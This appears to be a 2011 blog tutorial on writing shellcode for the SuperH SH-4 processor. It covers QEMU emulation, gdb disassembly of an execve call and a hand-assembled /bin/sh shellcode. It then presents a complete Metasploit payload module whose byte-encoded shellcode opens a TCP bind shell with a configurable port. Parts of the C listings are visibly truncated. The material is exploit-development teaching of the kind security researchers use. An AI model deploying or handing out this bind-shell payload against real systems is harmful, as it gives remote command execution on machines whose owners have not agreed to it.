Friday, June 24, 2011

SH4 fun

# Description

A brief tutorial on SuperH4 architecture.

# Specs

SuperH Family :

Source :

We will focus on the simple SH-4, also referred as SH7750 series. To start such an adventure we will need the precise description of this subtle architecture, and after some guessing we land at SuperH7750 Software Reference manual (

There is, among other, the opcode list for this processor! As we won't make shellcodes on a sheet of paper, next step is to setup the whole environment. You have two possibilites here, boot your ultra rare superh machine, or emulate it with qemu. Let's describe the latter.

# Qemu setup

First thing to come in mind when you have to deal with uncommon architectures : google "aurel32 #REPLACE_WITH_ARCH". This debian man just made an awesome work by setting up debian qemu images for arm,........,sh4. So download the following files :




By following the README, we launch qemu-system-sh4 with the following flags :

qemu-system-sh4 -M r2d -kernel vmlinuz-2.6.32-5-sh7751r -initrd initrd.img-2.6.32-5-sh7751r -hda debian_sid_sh4_standard.qcow2 -append "root=/dev/sda1 console=tty0 noiotrap" -net nic -net user -redir tcp:2222::22

Note that I added the tcp redirection to be able to ssh directly. Don't forget to "aptitude update && aptitude upgrade", as this is an old release you will have some stuff to update and unfortunately this emulated machine is slow as hell (btw you can fully read the specs in the meantime :).

# Shellcoding

First step, executing "/bin/sh" via a shellcode. Our architecture works essentially with registers, and according to the msdn documentation [1] we can identify their meaning :

 R0         Return values

 R1         Temp register
 R2         Temp register
 R3         Temp register

 R4         First function argument
 R5         Second function argument
 R6         Third function argument
 R7         Fourth function argument

 R8         Permanent register
 R9         Permanent register
 R10        Permanent register
 R11        Permanent register
 R12        Permanent register
 R13        Permanent register

 R14        Default frame pointer

 R15        Stack pointer

Now let's analyze how gcc compile a simple execve code :

root@debian-sh4:~# cat execve.c
void getshell()
   char *str = "//bin/sh";

void main()
root@debian-sh4:~# gcc execve.c -o execve -g

We load it into our sh4 gdb :

root@debian-sh4:~# gdb -q execve
Reading symbols from /root/execve...done.
(gdb) disassemble main
Dump of assembler code for function main:
  0x004004f8 <+0>:     mov.l   r14,@-r15
  0x004004fa <+2>:     sts.l   pr,@-r15
  0x004004fc <+4>:     mov     r15,r14
  0x004004fe <+6>:     mov.l   0x400510 <main+24>,r1   ! 0x4004c0 <getshell>
  0x00400500 <+8>:     jsr     @r1
  0x00400502 <+10>:    nop
  0x00400504 <+12>:    mov     r14,r15
  0x00400506 <+14>:    lds.l   @r15+,pr
  0x00400508 <+16>:    mov.l   @r15+,r14
  0x0040050a <+18>:    rts
  0x0040050c <+20>:    nop
  0x0040050e <+22>:    nop
  0x00400510 <+24>:    .word 0x04c0
  0x00400512 <+26>:    .word 0x0040
End of assembler dump.

Call to a subroutine is done via the instruction jsr @addr, next step, the disassembly of the "getshell" function

(gdb) disassemble getshell
Dump of assembler code for function getshell:
  0x004004c0 <+0>:     mov.l   r14,@-r15
  0x004004c2 <+2>:     sts.l   pr,@-r15
  0x004004c4 <+4>:     add     #-4,r15
  0x004004c6 <+6>:     mov     r15,r14
  0x004004c8 <+8>:     mov     r14,r1
  0x004004ca <+10>:    add     #-60,r1
  0x004004cc <+12>:    mov.l   0x4004f0 <getshell+48>,r2       ! 0x40063c
  0x004004ce <+14>:    mov.l   r2,@(60,r1)
  0x004004d0 <+16>:    mov     r14,r1
  0x004004d2 <+18>:    add     #-60,r1
  0x004004d4 <+20>:    mov.l   @(60,r1),r1
  0x004004d6 <+22>:    mov     r1,r4
  0x004004d8 <+24>:    mov     #0,r5
  0x004004da <+26>:    mov     #0,r6
  0x004004dc <+28>:    mov.l   0x4004f4 <getshell+52>,r1       ! 0x400378 <execve@plt>
  0x004004de <+30>:    jsr     @r1
  0x004004e0 <+32>:    nop
  0x004004e2 <+34>:    add     #4,r14
  0x004004e4 <+36>:    mov     r14,r15
  0x004004e6 <+38>:    lds.l   @r15+,pr
  0x004004e8 <+40>:    mov.l   @r15+,r14
  0x004004ea <+42>:    rts
  0x004004ec <+44>:    nop
  0x004004ee <+46>:    nop
  0x004004f0 <+48>:    mov.b   @(r0,r3),r6
  0x004004f2 <+50>:    .word 0x0040
  0x004004f4 <+52>:    .word 0x0378
  0x004004f6 <+54>:    .word 0x0040
End of assembler dump.

Focusing on the execve function call, we can see that the address of our "/bin/sh" string is loaded in r4, then 0 in r5 and r6. In our shellcode we will only use syscalls to be as independant as possible. A step deeper, we have the execve@plt disassembly (not resolved) :

(gdb) disassemble execve
Dump of assembler code for function execve@plt:
  0x00400378 <+0>:     mov.l   0x40038c <execve@plt+20>,r0     ! 0x41076c <_GLOBAL_OFFSET_TABLE_+20>
  0x0040037a <+2>:     mov.l   @r0,r0
  0x0040037c <+4>:     mov.l   0x400388 <execve@plt+16>,r1     ! 0x400324
  0x0040037e <+6>:     jmp     @r0
  0x00400380 <+8>:     mov     r1,r0
  0x00400382 <+10>:    mov.l   0x400390 <execve@plt+24>,r1     ! 0x18
  0x00400384 <+12>:    jmp     @r0
  0x00400386 <+14>:    nop
  0x00400388 <+16>:    mov.b   r2,@(r0,r3)
  0x0040038a <+18>:    .word 0x0040
  0x0040038c <+20>:    mov.b   @(r0,r6),r7
  0x0040038e <+22>:    .word 0x0041
  0x00400390 <+24>:    sett
  0x00400392 <+26>:    .word 0x0000
End of assembler dump.

We run it one time to resolve :

(gdb) r
Starting program: /root/execve
Got object file from memory but can't read symbols: File format not recognized.
process 32715 is executing new program: /bin/dash
# exit

Program exited normally.
(gdb) disassemble execve
Dump of assembler code for function execve:
  0x29625d40 <+0>:     mov.l   r12,@-r15
  0x29625d42 <+2>:     mova    0x29625d9c <execve+92>,r0
  0x29625d44 <+4>:     mov.l   0x29625d9c <execve+92>,r12      ! 0xb7a34
  0x29625d46 <+6>:     mov     #11,r3
  0x29625d48 <+8>:     add     r0,r12
  0x29625d4a <+10>:    trapa   #19
  0x29625d4c <+12>:    or      r0,r0
  0x29625d4e <+14>:    or      r0,r0
  0x29625d50 <+16>:    or      r0,r0
  0x29625d52 <+18>:    or      r0,r0
  0x29625d54 <+20>:    or      r0,r0
  0x29625d56 <+22>:    mov.w   0x29625d98 <execve+88>,r1       ! 0xf000
  0x29625d58 <+24>:    cmp/hi  r1,r0
  0x29625d5a <+26>:    bt.s    0x29625d80 <execve+64>
  0x29625d5c <+28>:    mov     r0,r3
  0x29625d5e <+30>:    rts
  0x29625d60 <+32>:    mov.l   @r15+,r12
  0x29625d62 <+34>:    nop
  0x29625d7e <+62>:    nop
  0x29625d80 <+64>:    mov.l   0x29625d8c <execve+76>,r0       ! 0x198
  0x29625d82 <+66>:    stc     gbr,r1
  0x29625d84 <+68>:    mov.l   @(r0,r12),r0
  0x29625d86 <+70>:    bra     0x29625d90 <execve+80>
  0x29625d88 <+72>:    add     r0,r1
  0x29625d8a <+74>:    nop
  0x29625d8c <+76>:    .word 0x0198
  0x29625d8e <+78>:    .word 0x0000
  0x29625d90 <+80>:    neg     r3,r3
  0x29625d92 <+82>:    mov.l   r3,@r1
  0x29625d94 <+84>:    bra     0x29625d5e <execve+30>
  0x29625d96 <+86>:    mov     #-1,r0
  0x29625d98 <+88>:    fadd    fr0,fr0
  0x29625d9a <+90>:    nop
  0x29625d9c <+92>:    add     #52,r10
  0x29625d9e <+94>:    rts
End of assembler dump.

Better. This "trapa" instruction seems cool, with 11 in r3, let's see the execve syscall number :

root@debian-sh4:~# grep execve /usr/include/asm/unistd_32.h
#define __NR_execve              11

So r3 with the syscall number and r0 with the string address, perfect. Instructions are pretty limited and we can only push registers on the "stack", so to push a byte on the stack, it takes 4 bytes :

mov #imm, reg
mov reg,@-r15

First thought is to push bytes one by one (I am getting an error when putting immediate larger than 0xff) :

* execve ("/bin/sh");
       add     #-8, r15
       mov     r15, r4
       mov     #110, r2
       shll8   r2
       add     #105, r2
       shll8   r2
       add     #98, r2
       shll8   r2
       add     #47, r2
       mov.l   r2, @r15
       add     #4, r15
       xor     r2, r2
       shll8   r2
       add     #104, r2
       shll8   r2
       add     #115, r2
       shll8   r2
       add     #47, r2
       mov.l   r2, @r15
       mov     #11, r3
       xor     r5, r5
       xor     r6, r6
       trapa   #19
#include <stdio.h>
#include <string.h>

char code[] = 

int main()
   printf("len:%d bytes\n", strlen(code));
   (*(void(*)()) code)();
   return 0;

But it is so fat! A ninja found another way to do it better here, but this example focused on how to use the stack :)

# Metasploit ninja

We will add the SuperH4 architecture to metasploit :

% svn co
% svn diff
Index: lib/rex/constants.rb
--- lib/rex/constants.rb        (révision 13017)
+++ lib/rex/constants.rb        (copie de travail)
@@ -80,6 +80,9 @@
ARCH_TTY    = 'tty'
ARCH_ARMLE  = 'armle'
ARCH_ARMBE  = 'armbe'
+ARCH_SH4    = 'sh4'
+ARCH_SH4LE  = 'sh4le'
+ARCH_SH4BE  = 'sh4be'
ARCH_JAVA   = 'java'
@@ -95,6 +98,9 @@
+               ARCH_SH4,
+               ARCH_SH4LE,
+               ARCH_SH4BE,
Index: lib/rex/arch.rb
--- lib/rex/arch.rb     (révision 13017)
+++ lib/rex/arch.rb     (copie de travail)
@@ -63,6 +63,12 @@
                       when ARCH_ARMBE
+                       when ARCH_SH4
+                               [addr].pack('V')
+                       when ARCH_SH4LE
+                               [addr].pack('V')
+                       when ARCH_SH4BE
+                               [addr].pack('N')

The ARCH_SH4, ARCH_SH4BE and ARCH_SH4LE are now recognized by rex! As an example, we can simply create the metasploit module shell_bind_tcp.rb in modules/payloads/singles/linux/sh4/shell_bind_tcp.rb :

# $Id: shell_reverse_tcp.rb 12196 2011-04-01 00:51:33Z egypt $

# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.

require 'msf/core'
require 'msf/core/handler/bind_tcp'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'

module Metasploit3

   include Msf::Payload::Single
   include Msf::Payload::Linux
   include Msf::Sessions::CommandShellOptions

   def initialize(info = {})
           'Name'          => 'Linux Command Shell, Bind TCP Inline',
           'Version'       => '$Revision: 1 $',
           'Description'   => 'Listen for a connection and spawn a command shell',
           'Author'        => 'Dad`',
           'License'       => MSF_LICENSE,
           'Platform'      => 'linux',
           'Arch'          => ARCH_SH4,
           'Handler'       => Msf::Handler::BindTcp,
           'Session'       => Msf::Sessions::CommandShellUnix,
           'Payload'       =>
                   'Offsets' =>
                           'LPORT'    => [ 116, 'n' ],
                   'Payload' =>
                       #### Tested successfully on:
                       # Linux debian-sh4 2.6.39-2-sh7751r
                       # s = socket(2, 1, 0)
                       "\x66\xe3"        +#   mov     #102,r3
                       "\x02\xe4"        +#   mov     #2,r4
                       "\x01\xe5"        +#   mov     #1,r5
                       "\x6a\x26"        +#   xor     r6,r6
                       "\x66\x2f"        +#   mov.l   r6,@-r15
                       "\x56\x2f"        +#   mov.l   r5,@-r15
                       "\x46\x2f"        +#   mov.l   r4,@-r15
                       "\x01\xe4"        +#   mov     #1,r4
                       "\xf3\x65"        +#   mov     r15,r5
                       "\x13\xc3"        +#   trapa   #19
                       # bind(s, {2, port, 16}, 16)
                       "\x03\x64"        +#   mov     r0,r4
                       "\x03\x68"        +#   mov     r0,r8
                       "\x2a\x22"        +#   xor     r2,r2
                       "\x26\x2f"        +#   mov.l   r2,@-r15
                       "\x15\xc7"        +#   mova    4000c8 <dup+0x18>,r0
                       "\x01\x62"        +#   mov.w   @r0,r2
                       "\x28\x42"        +#   shll16  r2
                       "\x02\x72"        +#   add     #2,r2
                       "\x26\x2f"        +#   mov.l   r2,@-r15
                       "\xf3\x65"        +#   mov     r15,r5
                       "\x10\xe6"        +#   mov     #16,r6
                       "\x66\x2f"        +#   mov.l   r6,@-r15
                       "\x56\x2f"        +#   mov.l   r5,@-r15
                       "\x46\x2f"        +#   mov.l   r4,@-r15
                       "\x02\xe4"        +#   mov     #2,r4
                       "\xf3\x65"        +#   mov     r15,r5
                       "\x13\xc3"        +#   trapa   #19
                       # listen(s, 0)
                       "\x83\x64"        +#   mov     r8,r4
                       "\x5a\x25"        +#   xor     r5,r5
                       "\x6a\x26"        +#   xor     r6,r6
                       "\x66\x2f"        +#   mov.l   r6,@-r15
                       "\x56\x2f"        +#   mov.l   r5,@-r15
                       "\x46\x2f"        +#   mov.l   r4,@-r15
                       "\x04\xe4"        +#   mov     #4,r4
                       "\xf3\x65"        +#   mov     r15,r5
                       "\x13\xc3"        +#   trapa   #19
                       # fd = accept(s, 0, 0)
                       "\x83\x64"        +#   mov     r8,r4
                       "\x5a\x25"        +#   xor     r5,r5
                       "\x66\x2f"        +#   mov.l   r6,@-r15
                       "\x56\x2f"        +#   mov.l   r5,@-r15
                       "\x46\x2f"        +#   mov.l   r4,@-r15
                       "\x05\xe4"        +#   mov     #5,r4
                       "\xf3\x65"        +#   mov     r15,r5
                       "\x13\xc3"        +#   trapa   #19
                       # dup2(fd, 2-1-0)
                       "\x03\x69"        +#   mov     r0,r9
                       "\x03\xea"        +#   mov     #3,r10
                       # <dup>:
                       "\xff\x7a"        +#   add     #-1,r10
                       "\x3f\xe3"        +#   mov     #63,r3
                       "\x93\x64"        +#   mov     r9,r4
                       "\xa3\x65"        +#   mov     r10,r5
                       "\x13\xc3"        +#   trapa   #19
                       "\x15\x4a"        +#   cmp/pl  r10
                       "\xf8\x89"        +#   bt      4000b0 <dup>
                       # execve(shell, 0, 0)
                       "\x0b\xe3"        +#   mov     #11,r3
                       "\x02\xc7"        +#   mova    4000cc <dup+0x1c>,r0
                       "\x03\x64"        +#   mov     r0,r4
                       "\x5a\x25"        +#   xor     r5,r5
                       "\x13\xc3"        +#   trapa   #19
                       "\x00\x00"        +#   LPORT
                       "\xff\xff"        +#   Junk
                       "/bin/sh"          #   Shell

     'SHELL', [ true, "Shell to execute.", "/bin/sh" ])
           ], self.class)

   def generate
       p = super

       sh = datastore['SHELL']
       p[120, sh.length] = sh



This is a simple example on how to perform a bind shell with a parametrable LPORT and SHELL. Their offsets are calculated relatively to the end. Note that I am using the socketcall syscall to handle the socket, listen, bind and accept commands. Arguments are pushed onto the stack respectively, then a pointer to this location is saved in r5, the syscall #63 is stored in r3 and finally r4 defines the action that socketcall should execute. Also, the dup2 over the three standards file descriptors is in a loop decrementing r10.

The shellcode is certainly far from optimal, but this is a first approach to this exotic architecture! I don't really know how to submit modules to metasploit framework, but if any of you knows ... :)


No comments:

Post a Comment